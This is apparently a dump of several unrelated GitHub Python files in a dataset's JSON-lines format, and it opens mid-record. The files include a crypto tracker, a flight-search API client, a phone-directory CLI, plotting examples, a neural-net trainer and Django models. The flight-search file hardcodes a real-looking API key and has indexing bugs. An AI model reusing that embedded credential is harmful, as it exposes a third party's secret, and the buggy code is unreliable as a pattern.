(y/n)\\n\").lower() == \"y\":\n portfolio: List[dict] = read_csv(PORTFOLIO_FILE)\n\n for coin in portfolio:\n portfolio.remove(coin)\n\n write_csv(PORTFOLIO_FILE, portfolio)\n\n else:\n sys.exit(\"Operation cancelled\")\n\n\ndef print_table() -> None:\n portfolio, totals = get_values()\n\n print()\n print(\" CRYPTO TRACKER \".center(83, \"*\"))\n print()\n print(\n \"TICKER\".ljust(10),\n \"AMOUNT\".ljust(13),\n \"PRICE\".rjust(6),\n \"Δ 24H\".rjust(10),\n \"USD\".rjust(10),\n \"BRL\".rjust(14),\n \"%\".rjust(11),\n )\n print(\"-\".center(83, \"-\"))\n\n for coin in sorted(portfolio, key=lambda c: c[\"usd_value\"], reverse=True):\n print(\n f\"{coin['ticker'].upper():<5}\",\n f\"{float(coin['amount']):>11,.3f}\",\n f\"{float(coin['rates']['usd']):>13,.2f}\",\n f\"{coin['delta_24']:>10.3f}\",\n f\"{float(coin['usd_value']):>13,.2f}\",\n f\"{float(coin['brl_value']):>14,.2f}\",\n f\"{coin['%']:>10.2f}%\",\n )\n\n print(\"-\".center(83, \"-\"))\n print()\n print(\"TOTAL:\".rjust(45), f\"{totals[0]:>10,.2f}\", f\"{totals[1]:>14,.2f}\")\n print()\n print(\"*\".center(83, \"*\"))\n print()\n\n\ndef in_portfolio(ticker: str) -> bool:\n \"\"\"\n Checks if a certain coin is already in the portfolio\n :param ticker: str with the ticker of the coin\n :return: True or False\n \"\"\"\n portfolio = read_csv(PORTFOLIO_FILE)\n for row in portfolio:\n if row[\"ticker\"] == ticker:\n return True\n else:\n continue\n return False\n\n\ndef get_coin_id(ticker: str) -> str:\n \"\"\"\n Gets the id used to parse data from the CoinGecko API\n :param ticker: ticker of the coin\n :return: str with the coin's id\n \"\"\"\n for coin in supported_coins:\n if coin[\"symbol\"] == ticker:\n return coin[\"id\"]\n else:\n continue\n\n\ndef get_values() -> Tuple[List[dict], Tuple[float, float]]:\n \"\"\"\n Reads the data in the portfolio and calculate the values of each coin\n in USD and BRL. 
Adds these values to a dict and returns it\n :return: a list of dicts for each coin and a tuple with the total worth\n of the portfolio in USD and BRL\n \"\"\"\n portfolio: List[dict] = read_csv(PORTFOLIO_FILE)\n rates: List[dict] = get_rates(portfolio)\n deltas: dict = get_delta(portfolio)\n\n for coin in portfolio:\n coin[\"rates\"] = rates[coin[\"id\"]]\n coin[\"usd_value\"] = float(coin[\"amount\"]) * float(coin[\"rates\"][\"usd\"])\n coin[\"brl_value\"] = float(coin[\"amount\"]) * float(coin[\"rates\"][\"brl\"])\n coin[\"delta_24\"] = deltas[coin[\"id\"]]\n\n totals: Tuple[float, float] = get_totals(portfolio)\n\n for coin in portfolio:\n coin[\"%\"] = (float(coin[\"usd_value\"]) / totals[0]) * 100\n\n return portfolio, totals\n\n\ndef get_rates(portfolio: List[dict]) -> List[dict]:\n \"\"\"\n Requests the CoinGecko API for the current rate for each coin\n :param portfolio: list of dicts for each coin in portfolio\n :return: list of dicts with the current price for each coin in portfolio\n \"\"\"\n return cg.get_price(ids=[coin[\"id\"] for coin in portfolio], vs_currencies=[\"usd\", \"brl\"])\n\n\ndef get_delta(portfolio: List[dict]) -> dict:\n \"\"\"\n Requests the CoinGecko API fot the 24 hours variation in price\n for each coin in the portfolio\n :param portfolio: list of dicts for each coin in portfolio\n :return: dictionary with the coin and its 24 hours variation in price\n \"\"\"\n market_data: dict = cg.get_coins_markets(vs_currency=\"usd\", ids=[coin[\"id\"] for coin in portfolio])\n return {coin[\"id\"]: coin[\"price_change_percentage_24h\"] for coin in market_data}\n\n\ndef get_totals(portfolio: List[dict]) -> Tuple[float, float]:\n \"\"\"\n Sum the value for every coin in the portfolio to get the total\n value both in USD and BRL\n :param portfolio: list of dicts for each coin in portfolio\n :return: total value in USD and BRL\n \"\"\"\n total_usd: float = 0.0\n total_brl: float = 0.0\n for coin in portfolio:\n total_usd += float(coin[\"usd_value\"])\n total_brl += float(coin[\"brl_value\"])\n return total_usd, total_brl\n\n\ndef create_new_portfolio() -> None:\n \"\"\"\n It's only called if the program is being run for the first\n time in a system or if the portfolio file was deleted\n :return: None\n \"\"\"\n fieldnames: List[str] = [\"id\", \"ticker\", \"amount\"]\n with open(\"portfolio.csv\", \"w\") as writefile:\n writer = csv.DictWriter(writefile, fieldnames=fieldnames)\n writer.writeheader()\n\n\ndef main():\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fredericomozzato/crypto_tracker","sub_path":"funcs_v2.py","file_name":"funcs_v2.py","file_ext":"py","file_size_in_byte":8859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74210489367","text":"import requests\nfrom datetime import date, timedelta\nfrom flight_data import FlightData\n\nKIWI_API_IAA_CODE_ENDPOINT = 'https://api.tequila.kiwi.com/locations/query'\nKIWI_API_SEARCH_ENDPOINT = 'https://api.tequila.kiwi.com/v2/search'\nKIWI_API_KEY = 'gryfKhvGE1iCSEdVE69ev48vrJ3qaGG7'\n\n\nclass FlightSearch:\n \"\"\"\n This class is responsible for communicating to the Flight Search API.\n \"\"\"\n\n def __init__(self, city_name):\n self.city_name = city_name\n self.kiwi_api_header = {\n 'apikey': KIWI_API_KEY\n }\n\n def get_city_iata_code(self, city_name):\n \"\"\"\n This function is responsible for fetching the IATA Code for the City based on the city name passed.\n :param city_name: The name of the city passed.\n :return: str\n 
\"\"\"\n\n kiwi_api_parameters = {\n 'term': city_name\n }\n api_response = requests.get(url=KIWI_API_IAA_CODE_ENDPOINT,\n params=kiwi_api_parameters,\n headers=self.kiwi_api_header)\n\n return api_response.json()['locations'][0]['code']\n\n def search_flights(self, destination_iata_code):\n \"\"\"\n\n :return:\n \"\"\"\n\n departure_date, date_after_six_months = date.today(), date.today() + timedelta(days=180)\n departure_date = departure_date.strftime(\"%d/%m/%G\")\n date_after_six_months = date_after_six_months.strftime(\"%d/%m/%G\")\n\n api_parameters = {\n 'fly_from': 'YYZ',\n 'fly_to': destination_iata_code,\n 'date_from': departure_date,\n 'date_to': date_after_six_months,\n 'curr': 'CAD'\n }\n\n flight_search_api_response = requests.get(url=KIWI_API_SEARCH_ENDPOINT,\n headers=self.kiwi_api_header,\n params=api_parameters)\n\n flight_details = flight_search_api_response.json()['data']\n print(flight_details[0]['price'])\n all_flight_data = FlightData(price=flight_details[0]['price'],\n departure_city=flight_details['route'][0]['cityFrom'],\n departure_airport_code=flight_details['route'][0]['flyFrom'],\n arrival_city=flight_details['route'][0]['cityTo'],\n arrival_airport_code=flight_details['route'][0]['route']['flyTo'],\n departure_date=flight_details['route'][0]['local_departure'].split('T')[0],\n date_after_six_months=flight_details['route'][1]['local_departure'].split('T')[0])\n\n # details = (f\"Price: {flight_details[0]['price']} CAD.\"\n # f\"Departure City: {flight_details[0]['cityFrom']}\"\n # f\"Departure Airport Code: {flight_details[0]['flyFrom']}\"\n # f\"Arrival City: {flight_details[0]['cityTo']}\"\n # f\"Arrival Airport Code: {flight_details[0]['flyTo']}\"\n # f\"Departure Date: {flight_details[0]['local_departure'].split('T')}\"\n # f\"Arrival Date: {flight_details[0]['local_arrival'].split('T')}\")\n\n return all_flight_data\n","repo_name":"Clandoor/CheapFlightFinder","sub_path":"flight_search.py","file_name":"flight_search.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37485979192","text":"from os import name,system\r\nimport datetime\r\n\r\ndef clear():\r\n if name == 'nt':\r\n _ = system('clear')\r\n else:\r\n _ = system('cls')\r\n\r\nclass Phone:\r\n\r\n # Constructor of Class\r\n # name is clue of direcotoy name\r\n # name_list is used for store person name in list ..\r\n # add_phone_number is used for store number and name dictionary \r\n\r\n\r\n def __init__(self,name,name_list):\r\n self.name=name\r\n self.name_list=name_list\r\n self.add_phone_number={} \r\n\r\n # data_file FUNCTION is used for parsed data in file and store in add_phone_number {}\r\n\r\n def data_file(self,file1):\r\n with open(file1) as f:\r\n lines=f.readlines()\r\n if lines==[] :\r\n pass\r\n else:\r\n for line in lines:\r\n parsed=line.split(',')\r\n self.add_phone_number.update({int(parsed[0].strip()) : parsed[1].strip()})\r\n self.name_list.append(parsed[1].strip())\r\n\r\n # data_store_file FUNCTION is used for store data in file \r\n \r\n def data_store_file(self,number,name):\r\n with open('telephone.txt','a')as fw:\r\n fw.write(f\"{number},{name}\\n\")\r\n\r\n\r\n # delete_data_in_file FUNCTION is used for delete data in file\r\n\r\n def delete_data_in_file(self,number): \r\n import os\r\n new_file_store_data={}\r\n with open('telephone.txt','r') as fd:\r\n lines=fd.readlines()\r\n for line in lines:\r\n line1=line.split(',')\r\n # print(line)\r\n # if 
line1[0]!=str(number):\r\n if str(number) not in line1:\r\n new_file_store_data.update({line1[0]:line1[1]})\r\n else:\r\n # print('wHAT hAPPENS WITH mE ?')\r\n pass\r\n\r\n os.remove('telephone.txt')\r\n with open('telephone.txt','a') as fw:\r\n for num,name in new_file_store_data.items():\r\n fw.write(f\"{num},{name}\")\r\n\r\n \r\n \r\n # display_phone_numbers FUNCTION is used for display all contact in phone directory\r\n\r\n def display_phone_numbers(self):\r\n if self.add_phone_number=={}:\r\n print('\\t\\tEMPTY')\r\n print('\\n\\t','-'*59)\r\n print('\\t\\t\\tPerson Name\\t | \\tPhone Number')\r\n j=1\r\n for key,value in self.add_phone_number.items():\r\n print('\\t','-'*59)\r\n print(f\"\\t{j} | \\t\\t{value}\\t | \\t0{key}\\t |\")\r\n j+=1\r\n print('\\t','-'*59)\r\n\r\n # addition_number FUNCTION is used for save number add_phone_number and data_store_file\r\n\r\n def addition_number(self,number,name):\r\n if number not in self.add_phone_number.keys():\r\n self.name_list.append(name)\r\n self.add_phone_number.update({number : name})\r\n self.data_store_file(number,name)\r\n print('\\t\\tNumber store in database successfully .')\r\n else:\r\n print(f'\\t\\tThis {number} already exits by {self.add_phone_number[number]}')\r\n\r\n # remove_number FUNCTION is used for delete contact from file and add_phone_number \r\n\r\n def remove_number(self,number):\r\n if number in self.add_phone_number.keys():\r\n self.name_list.remove(self.add_phone_number[number])\r\n self.add_phone_number.pop(number)\r\n self.delete_data_in_file(number)\r\n print('\\t\\tThe number deleted successfully .')\r\n else:\r\n print(f\"\\t\\tThis number not in phone directory . Please chech your number..\")\r\n\r\n # search_number is used for search number in phone directory \r\n\r\n def search_number(self,number):\r\n if self.add_phone_number=={}:\r\n print('\\t\\tEMPTY')\r\n\r\n elif number in self.add_phone_number.keys():\r\n print(f\"\\t\\tThis number exit in phone directory with name {self.add_phone_number[number]}\")\r\n else:\r\n print('\\t\\tThis phone number not exit in phone directory . please check your number..')\r\n\r\n # search_name is used for search name in phone directory \r\n\r\n def search_name(self,name):\r\n if self.add_phone_number=={}:\r\n print('\\t\\tEMPTY')\r\n\r\n elif name in self.name_list:\r\n # print('\\t\\tThis name exit in phone directory .')\r\n j=1\r\n for key,value in self.add_phone_number.items():\r\n if name==value:\r\n print(f\"\\t\\t{j} . {value} ------ 0{key}\")\r\n j+=1\r\n else:\r\n print('\\t\\tThis name not exit in phone directory .')\r\n\r\n\r\n # display_name is used for display all name in phone directory \r\n\r\n def display_name(self):\r\n if self.name_list==[]:\r\n print('\\t\\tEMPTY')\r\n j=1\r\n for name in self.name_list:\r\n print(f\"\\t\\t{j} . {name}\")\r\n j+=1\r\n \r\n\r\nif __name__ == \"__main__\":\r\n phone_obj=Phone(\"Welcome To Haider's Phone Directory\",[])\r\n phone_obj.data_file('telephone.txt')\r\n\r\n\r\n print(f'\\n\\n\\n\\t\\t\\t\\t\\t\\t\\t{phone_obj.name}\\n\\n')\r\n print('\\t1 . Display All Contacts In Directory\\t\\t2 . Add Contact In Directory\\t\\t3 . Remove Number In Contact\\n\\n\\t4 . Search Number In Directory By Number\\t5 . Search Contact In Directory By Name\\t 6 .Display All Contact In Directory\\n\\n\\t\\t\\t\\t\\t\\t\\t7 . For Exit The Programme')\r\n print('\\n\\n\\n')\r\n\r\n\r\n # print('\\n\\n\\t\\t\\t\\t\\tPHONE DIRECTORY ...\\n\\n')\r\n # print('\\t\\t\\t\\t1 . 
Display all Contacts in Directory .')\r\n # print('\\t\\t\\t\\t2 . Add Contact in Directory .')\r\n # print('\\t\\t\\t\\t3 . Remove Contact from Directory .')\r\n # print('\\t\\t\\t\\t4 . Search Contact in Directory by number .')\r\n # print('\\t\\t\\t\\t5 . Search Contact in Directory by name .')\r\n # print('\\t\\t\\t\\t6 . Display all name in Directory .')\r\n # print('\\t\\t\\t\\t7 . For exit the programe .\\n\\n')\r\n\r\n\r\n\r\n while True:\r\n # print(f'\\n\\n\\n\\t\\t\\t\\t\\t\\t\\t{phone_obj.name}\\n\\n')\r\n # print('\\t1 . Display All Contacts In Directory\\t\\t2 . Add Contact In Directory\\t\\t3 . Remove Number In Contact\\n\\n\\t4 . Search Number In Directory By Number\\t5 . Search Contact In Directory By Name\\t 6 .Display All Contact In Directory\\n\\n\\t\\t\\t\\t\\t\\t\\t7 . For Exit The Programme\\n\\n\\n\\n')\r\n choice=input('Enter Command For Phone Directory : ').strip()\r\n if choice=='1':\r\n phone_obj.display_phone_numbers()\r\n elif choice=='2':\r\n number=input('Please enter a number :').strip().title()\r\n name=input('Plese enter your name :').strip().title()\r\n try:\r\n number1=int(number)\r\n except Exception as e:\r\n print('\\t\\tYour number is not defined please enter in digits....')\r\n else:\r\n if name.isnumeric() or name.isspace() or name=='':\r\n print('\\t\\tNumbers are not allowed in name ....')\r\n else:\r\n total=''\r\n for i in name:\r\n if i.isalpha() or i.isspace():\r\n total+=i\r\n else:\r\n break\r\n if len(name)==len(total):\r\n phone_obj.addition_number(number1,name)\r\n else:\r\n print('\\t\\tNumbers are not allowed in name ...')\r\n\r\n elif choice=='3':\r\n number=input('Enter a number that you want delete : ').strip()\r\n try:\r\n number1=int(number)\r\n except Exception as e:\r\n print('\\t\\tYour number is not defined in digits .....')\r\n else:\r\n phone_obj.remove_number(number1)\r\n \r\n elif choice=='4':\r\n number=input('Please enter a number for search ...').strip()\r\n try:\r\n number1=int(number)\r\n phone_obj.search_number(number1)\r\n except Exception as e:\r\n print('\\t\\tYour number is not defined in alphabets .....')\r\n elif choice=='5':\r\n name=input('Please enter name for search :').strip().title()\r\n try:\r\n name = str(name)\r\n except Exception as e:\r\n print('\\t\\tOnly alphabets are allowed in name ...')\r\n else:\r\n if name.isnumeric() or name.isspace() or name=='':\r\n print('\\t\\tYour name is not defined please check it ....')\r\n else:\r\n total=''\r\n for i in name:\r\n if i.isalpha() or i.isspace():\r\n total+=i\r\n else:\r\n break\r\n if len(name)==len(total):\r\n phone_obj.search_name(name)\r\n else:\r\n print('\\t\\tNumbers are not allowed in name ...')\r\n elif choice=='6':\r\n phone_obj.display_name()\r\n elif choice=='7'or choice=='q':\r\n exit()\r\n else:\r\n print(\"Some Thing Went Wrong In Your Choice Please Give Me Right Options In Given Below !\")\r\n\r\n ","repo_name":"Hayder7Aly/Telephone-Directory","sub_path":"telephone_dict.py","file_name":"telephone_dict.py","file_ext":"py","file_size_in_byte":9176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4646475335","text":"# ## Matplotlib: publication quality plots\r\n# * Provides capabilities for plotting similar to Matlab\r\n# * Interactive and animated figures\r\n# * Posibility for LaTeX rendering for improved quality\r\n# * Most other plotting libraries rely on Matplotlib or use a similar syntax\r\n#\r\n\r\n# ### The pyplot sub-module is the most useful for us\r\n\r\nimport 
matplotlib.pyplot as plt # import as an alias for easier typing.\r\n\r\nimport numpy as np\r\n# ## Let's make a simple parabola plot\r\n\r\nx = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\r\ny = [1, 4, 9, 16, 25, 36, 49, 64, 81, 100, 121, 144, 169, 196, 225]\r\n\r\nfig, ax = plt.subplots()\r\nax.set_xlabel('X axis')\r\nax.set_ylabel('Y axis')\r\nax.set_title('Parabola')\r\nax.plot(x, y)\r\n\r\n# ## Customize your plots\r\n\r\n# Use LaTeX fonts:\r\nplt.style.use({'font.family': 'STIXGeneral',\r\n 'font.serif': 'Computer Modern',\r\n 'font.sans-serif': 'Computer Modern Sans serif', })\r\n\r\ny_noisy = np.random.normal(y, 5) # create some noisy data to simulate the experimental points\r\n\r\n# create a new plot\r\nfig2, ax2 = plt.subplots()\r\nax2.set_xlabel('X axis')\r\nax2.set_ylabel('Y axis')\r\nax2.plot(x, y, label='2nd order polynomial')\r\nax2.plot(x, y_noisy, 'rd--', label='Experimental points', alpha=0.5)\r\nax2.grid()\r\nax2.set_xlim([0, 10])\r\nax2.set_ylim([0, 125])\r\nax2.legend()\r\nfig2.savefig('figure.png')\r\n","repo_name":"DimensionLab/vki-course","sub_path":"Presentations/Lecture_03/Examples/matplotlib_examples_part1.py","file_name":"matplotlib_examples_part1.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"70800534487","text":"import joblib\nimport logging\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport typing as t\nfrom collections import OrderedDict\nfrom python_file.practice.deep_learning.test_learning_technique import *\n\nlogging.basicConfig(level=logging.INFO)\n\n# ニューラルネットワークの学習を行うクラス\nclass Trainer:\n def __init__(\n self,\n network,\n x_train,\n t_train,\n x_test,\n t_test,\n epoch_num=20,\n batch_size=100,\n optimizer=\"sgd\",\n optimizer_param={\"lr\": 0.01},\n evaluate_sample_num_per_epoch=None, \n verbose=True,\n ):\n self.network = network\n self.x_train = x_train\n self.t_train = t_train\n self.x_test = x_test\n self.t_test = t_test\n self.verbose = verbose\n self.epoch_num = epoch_num\n self.batch_size = batch_size\n self.evaluate_sample_num_per_epoch = evaluate_sample_num_per_epoch\n\n # パラメータ更新時の手法\n optimizer_class_dict = {\n 'sgd': SGD,\n 'momentum': Momentum,\n 'adagrad': AdaGrad\n } \n\n self.optimizer = optimizer_class_dict[optimizer](**optimizer_param)\n self.train_size = x_train.shape[0] # 入力データ数(全画像枚数)\n self.iter_per_epoch = max(self.train_size / batch_size, 1) # 全学習データを何回のバッチで網羅できるか \n self.max_iter = int(epoch_num * self.iter_per_epoch) # イテレーション数\n self.current_iter = 0\n self.current_epoch = 0\n self.train_loss_list = []\n self.train_acc_list = []\n self.test_acc_list = []\n\n def train(self):\n for i in range(self.max_iter):\n self.train_step() # イテレーション数だけ学習を行う。\n\n test_acc = self.network.accuracy(self.x_test, self.t_test)\n logging.info(f'=============== Final Test Accuracy : {test_acc}===============')\n\n \n def train_step(self):\n batch_mask = np.random.choice(self.train_size, self.batch_size)\n x_train_batch = self.x_train[batch_mask]\n t_train_batch = self.t_train[batch_mask]\n\n grads = self.network.gradient(x_train_batch, t_train_batch)\n\n self.optimizer.update(self.network.params, grads)\n\n loss = self.network.loss(x_train_batch, t_train_batch)\n self.train_loss_list.append(loss)\n\n # 特定のイテレーションにおいて評価を行う\n if self.current_iter % self.iter_per_epoch == 0:\n self.current_epoch += 1\n # 全データ\n x_train_sample, t_train_sample = self.x_train, self.t_train\n x_test_sample, t_test_sample = 
self.x_test, self.t_test\n # 1epoch毎に評価を行う場合\n if not self.evaluate_sample_num_per_epoch is None:\n t = self.evaluate_sample_num_per_epoch\n x_train_sample, t_train_sample = self.x_train[:t], self.t_train[:t]\n x_test_sample, t_test_sample = self.x_test[:t], self.t_test[:t]\n\n train_acc = self.network.accuracy(x_train_sample, t_train_sample)\n test_acc = self.network.accuracy(x_test_sample, t_test_sample)\n self.train_acc_list.append(train_acc)\n self.test_acc_list.append(test_acc)\n\n logging.info(f\"=== epoch: {self.current_epoch}, train acc: {train_acc}, test acc: {test_acc} ===\")\n self.current_iter += 1\n","repo_name":"ueda-hiroyuki/machine_learning","sub_path":"app/src/python_file/practice/deep_learning/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27046562551","text":"from yahooquery import Ticker\n\n\nclass YahooQuery:\n\n def __init__(self, symbols):\n\n self.symbols_info = []\n for symbol in symbols:\n if symbol.isalpha():\n info = Ticker(symbol)\n else:\n info = Ticker(symbol + \".T\")\n self.symbols_info.append(info)\n\n def get_valuation_measures(self):\n\n try:\n subsets = []\n for info in self.symbols_info:\n\n # 財務諸表を取得\n valuation_measures = info.valuation_measures\n\n # 行と列を入れ替えたDataFrameを作成\n valuation_measures_t = valuation_measures.T\n #\n # 目的の列のみを抽出\n try:\n subset_v = valuation_measures_t.loc[[\n 'asOfDate', 'periodType', 'PbRatio', 'PeRatio', 'MarketCap']]\n except:\n try:\n subset_v = valuation_measures_t.loc[[\n 'asOfDate', 'periodType', 'PbRatio', 'MarketCap']]\n except:\n subset_v = valuation_measures_t.loc[[\n 'asOfDate', 'periodType', 'MarketCap']]\n\n\n subset_v_t = subset_v.T\n # subset_v_t = subset_v_t.loc[subset_v_t['periodType'] == '3M'].copy()\n subset_v_t['symbol'] = valuation_measures_t.columns[0].replace(\".T\",\"\") # 証券コードを列 'symbol' に追加\n subsets.append(subset_v_t)\n\n except Exception as e:\n print(\"get_valuation_measures\")\n print(e)\n return subsets\n\n def get_income_statement(self):\n\n subsets = []\n try:\n for info in self.symbols_info:\n # yahooqueryでTickerオブジェクトを作成\n\n # 財務諸表を取得\n income_statement = info.income_statement()\n\n # 行と列を入れ替えたDataFrameを作成\n income_statement_t = income_statement.T\n #\n # 目的の列のみを抽出\n try:\n subset_v = income_statement_t.loc[[\n 'asOfDate', 'periodType', 'TotalOperatingIncomeAsReported', 'TotalRevenue']]\n except:\n subset_v = income_statement_t.loc[[\n 'asOfDate', 'periodType', 'TotalRevenue']]\n\n subset_v_t = subset_v.T\n # subset_v_t = subset_v_t.loc[subset_v_t['periodType'] == '12M'].copy()\n subset_v_t['symbol'] = income_statement_t.columns[0].replace(\".T\",\"\") # 証券コードを列 'symbol' に追加\n subsets.append(subset_v_t)\n\n except Exception as e:\n print(\"get_income_statement\")\n print(e) \n\n return subsets","repo_name":"Naoki0618/Streamlit","sub_path":"API/yahoo_query.py","file_name":"yahoo_query.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2793046422","text":"import math\r\nfrom mmcv.runner.hooks import HOOKS, LrUpdaterHook\r\n\r\n\r\n@HOOKS.register_module()\r\nclass ReduceOnPlateauLrUpdaterHook(LrUpdaterHook):\r\n\r\n \"\"\"\r\n\r\n Must be used together with EvalHook or DistEvalHook with save_best not being None.\r\n EvalHook saves best checkpoint's evaluation score and file path\r\n in ``runner.meta['hook_msgs']`` when the save_best is set.\r\n\r\n 
\"\"\"\r\n\r\n def __init__(self, factor=0.5, min_lr=5e-7, patience=3, **kwargs):\r\n self.factor = factor\r\n self.num_updates = 0\r\n self.min_lr = min_lr\r\n self.patience = patience\r\n self.no_optim = 0\r\n self.score = None\r\n super().__init__(**kwargs)\r\n\r\n def get_lr(self, runner, base_lr):\r\n if runner.meta is None:\r\n return base_lr\r\n\r\n msgs = runner.meta.get(\"hook_msgs\", None)\r\n if msgs is None:\r\n return base_lr\r\n\r\n best_score = msgs.get(\"best_score\", None)\r\n best_ckpt = msgs.get(\"best_ckpt\", None)\r\n\r\n if best_score is None or best_ckpt is None:\r\n pass\r\n elif self.score is None:\r\n self.score = best_score\r\n elif self.score == best_score:\r\n self.no_optim += 1\r\n if self.no_optim > self.patience:\r\n runner.load_checkpoint(best_ckpt)\r\n self.no_optim = 0\r\n self.num_updates += 1\r\n runner.logger.info(\r\n f'Reduce lr by a factor of {self.factor} and load model from the last best checkpoint.')\r\n else:\r\n self.score = best_score\r\n self.no_optim = 0\r\n\r\n lr = base_lr * math.pow(self.factor, self.num_updates)\r\n if self.min_lr is not None:\r\n lr = max(lr, self.min_lr)\r\n\r\n return lr\r\n\r\n\r\n","repo_name":"CAU-HE/CMCDNet","sub_path":"mmseg/core/hooks/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"31"} +{"seq_id":"33126624287","text":"# _*_ coding: utf-8 _*_\r\n'''\r\nwindows下使用gbk编码\r\n'''\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding('gbk')\r\n\r\nimport os.path\r\n\r\nimport tornado.httpserver\r\nimport tornado.ioloop\r\nimport tornado.options\r\nimport tornado.web\r\nfrom tornado.options import define, options\r\n\r\ndefine('port', default=8000, help='run on the given port', type=int)\r\n\r\n\r\nclass IndexHandler(tornado.web.RequestHandler):\r\n def get(self):\r\n self.render('index.html')\r\n\r\n\r\nclass GradeHandler(tornado.web.RequestHandler):\r\n def get(self):\r\n self.render('grade.html', g1='', g2='', g3='', g4='',g5='', g6='', g7='', g8='', g9='',g10='', g11='', g12='')\r\n\r\n def post(self):\r\n for i in xrange(1, 13):\r\n # locals()['name%s'%i] = self.get_argument('name%s'%i)\r\n\r\n locals()['grade%s' % i] = self.get_argument('grade%s' % i)\r\n\r\n self.render('grade.html', g1=eval('grade1'), g2=eval('grade2'), g3=eval('grade3'), g4=eval('grade4'),\r\n g5=eval('grade5'), g6=eval('grade6'), g7=eval('grade7'), g8=eval('grade8'), g9=eval('grade9'),\r\n g10=eval('grade10'), g11=eval('grade11'), g12=eval('grade12'))\r\n\r\n\r\n# class ChartModule(tornado.web.UIModule):\r\nclass LogHandler(tornado.web.RequestHandler):\r\n def post(self):\r\n title = self.get_argument('title')\r\n article = self.get_argument('article')\r\n self.render('log.html', title=title, article=article)\r\n\r\n\r\nif __name__ == '__main__':\r\n tornado.options.parse_command_line()\r\n app = tornado.web.Application(\r\n handlers=[(r'/', IndexHandler), (r'/grade', GradeHandler), (r'/log', LogHandler)],\r\n template_path=os.path.join(os.path.dirname(__file__), 'templates'),\r\n static_path=os.path.join(os.path.dirname(__file__), 'static')\r\n\r\n )\r\nhttp_server = tornado.httpserver.HTTPServer(app)\r\nhttp_server.listen(options.port)\r\ntornado.ioloop.IOLoop.instance().start()\r\n","repo_name":"dpj514/practice-website","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 
+{"seq_id":"572892661","text":"from django.conf import settings\nfrom django.utils.translation import gettext_lazy as _\nfrom django.db import models\n\n\nclass TimestampModel(models.Model):\n created_at = models.DateTimeField(\n auto_now_add=True,\n verbose_name=_(\"luotu\"),\n )\n \n class Meta: \n abstract =True\n\nclass OwnedModel(models.Model):\n owner = models.ForeignKey(\n settings.AUTH_USER_MODEL, \n on_delete=models.CASCADE,\n verbose_name=_(\"omistaja\"))\n \n class Meta: \n abstract =True\n\n\n\n\nclass Document(TimestampModel, OwnedModel):\n class Type(models.TextChoices):\n #KOODi_NIMI = (\"Tietokantaan TLENNTTAVA\", _(\"Käyttäjälle näkyvä\"))\n BILL = (\"BILL\", _(\"Lasku\"))\n RECEIPT = (\"RECEIPT\", _(\"Kuitti\"))\n CALCULATION = (\"CALCULATION\", _(\"Laskelma\"))\n OTHER = (\"OTHER\", _(\"Muu\"))\n\n type = models.CharField(\n max_length=20,\n choices=Type.choices,\n verbose_name=_(\"tyyppi\"),\n )\n name = models.CharField(\n max_length=100, \n blank=True,\n verbose_name=_(\"nimi\"),\n )\n file = models.FileField(\n upload_to=\"docs/%Y-%m/\",\n verbose_name=_(\"tiedosto\"),\n )\n \n class Meta:\n verbose_name=_(\"dokumentti\")\n verbose_name_plural=_(\"dokumentit\")\n\n def __str__(self):\n return self.name if self.name else f\"Document {self.id}\"\n \n\n\nclass Category(TimestampModel,OwnedModel):\n name =models.CharField(\n max_length=100,\n verbose_name=_(\"nimi\"),\n )\n parent = models.ForeignKey(\n \"self\",\n blank=True,\n null=True,\n related_name=\"subcategories\",\n on_delete=models.CASCADE,\n verbose_name=_(\"yläkategoria\"),\n )\n\n class Meta:\n verbose_name=_(\"kategoria\")\n verbose_name_plural=_(\"kategoriat\")\n \n def __str__(self):\n prefix = f\"{self.parent} / \" if self.parent else \"\"\n return f\"{prefix}{self.name}\"\n\nclass Account(TimestampModel,OwnedModel):\n name =models.CharField(\n max_length=100,\n )\n bank_account =models.CharField(max_length=50, null =True, blank=True)\n\n def __str__(self):\n return f\"{self.id:04d} {self.name}\"\n \n\nclass Transaction(TimestampModel):\n class Type(models.TextChoices):\n INCOME = (\"INCOME\", _(\"Tulo\"))\n EXPENSE = (\"EXPENSE\", _(\"Meno\"))\n\n class State(models.TextChoices):\n UPCOMING = (\"UPCOMING\", _(\"Tuleva\"))\n DONE = (\"DONE\", _(\"Tapahtunut\"))\n\n account = models.ForeignKey(Account, on_delete=models.RESTRICT)\n type = models.CharField(max_length=20, choices=Type.choices)\n state = models.CharField(max_length=20, choices=State.choices)\n date = models.DateField()\n amount = models.DecimalField(max_digits=20, decimal_places=2)\n category= models.ForeignKey(Category, null=True, blank=True, on_delete=models.SET_NULL)\n documents = models.ManyToManyField(Document, related_name=\"transactions\", blank=True,)\n\n documents = models.ManyToManyField(\n Document, \n related_name=\"transactions\",\n blank=True,\n )\n\n def __str__(self):\n return f\"{self.date} {self.account} {self.amount} ({self.state})\"\n\n \n \n ","repo_name":"dildorababaerova/django-meenot","sub_path":"moneyflow/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1456597930","text":"def sum_p(a,b,c):\n 